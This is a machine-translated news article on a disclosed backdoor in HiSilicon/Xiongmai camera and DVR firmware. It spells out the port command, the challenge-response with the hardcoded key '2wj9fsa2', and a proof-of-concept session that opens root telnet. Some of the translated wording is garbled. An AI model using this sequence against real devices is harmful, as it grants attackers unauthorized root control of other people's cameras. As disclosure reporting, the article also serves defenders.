Technology

The presence of a backdoor that can take over administrator rights to a Chinese network camera is reported


Security

The presence of a backdoor that can take over administrator rights to a Chinese network camera is reported

by rawf8

With the spread of IoT, which connects various things to the Internet, a large number of inexpensive smart speakers and network cameras manufactured by Chinese companies have come to market. However, in the past, devices made in China were vulnerableback doorHas been reported, security trust has become an issue, and this time there is also a back door that can take administrator authority with IoT devices such as network cameras equipped with Chinese firmwareYourChiefReported by Mr.

Full disclosure: 0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras / Habr
https://habr.com/en/post/486856/

0day vulnerability in firmware for HiSilicon-based DVRs, NVRs and IP cameras | Hacker News
https://news.ycombinator.com/item?id=22251329

GitHub-Snawoot / hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/
https://github.com/Snawoot/hisilicon-dvr-telnet

The backdoor reported this time gains device administrator privileges by sending specific signals to devices such as cameras connected to the network.TelnetThat can be remotely controlled via Chinese companyXiongmaiSome devices with firmware manufactured by Toshiba are eligible.

Hangzhou Xiongmai Technology Co., LTD.
http://www.xiongmaitech.com/en/index.php

Xiongmai devices were reported to have been infected with malware because the user name and password remained the default in 2016.

Large-scale DDoS attack, security camera on springboard, Chinese manufacturer recalls-ITmedia Enterprise
https://www.itmedia.co.jp/enterprise/articles/1610/25/news059.html

Specific verification methods to enable backdoors have also been reported. Devices with backdoors were originallyTCPSome ports are open. Connect to that port and send the string "OpenTelnet: OpenOnce".

The device that received the character string returns a character string of “randNum: XXXXXXXX” containing a random eight-digit number, so after sending “randNum: XXXXXXXX” to the device, the number and backdoor Send the character string "XXXXXXXX2wj9fsa2" that combines the default password "2wj9fsa2" of the device with the device.

If the authentication is successful, the device will respond with "verify: OK". Next, send the "Telnet: OpenOnce" string to the device again, and the Telnet service starts on the device. After that, if you connect using Telnet as usual using the user name "root" and password, you will be able to operate the device with administrator authority. The root user password is a file extracted from the firmware.hashchatIt has been clarified by analyzing using, and it is released along with the verification method.

There is also a program that can actually poke the back door.

GitHub-Snawoot / hisilicon-dvr-telnet: PoC materials for article https://habr.com/en/post/486856/
https://github.com/Snawoot/hisilicon-dvr-telnet

When the code is executed on the device, it operates as follows and gains administrator privileges.

$ telnet 198.51.100.23
Trying 198.51.100.23...
telnet: Unable to connect to remote host: Connection refused
$ ./hs-dvr-telnet 198.51.100.23 2wj9fsa2
Sent OpenTelnet:OpenOnce command.
randNum:46930886
challenge=469308862wj9fsa2
verify:OK
Open:OK
$ telnet 198.51.100.23
Trying 198.51.100.23...
Connected to 198.51.100.23.
Escape character is '^)'.
LocalHost login: root
Password:

"If you are using a device with this backdoor, consider replacing it immediately. If replacement is difficult, isolate your device from the network."

Copy the title and URL of this article

Source link

Do you like this article??

Show More

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button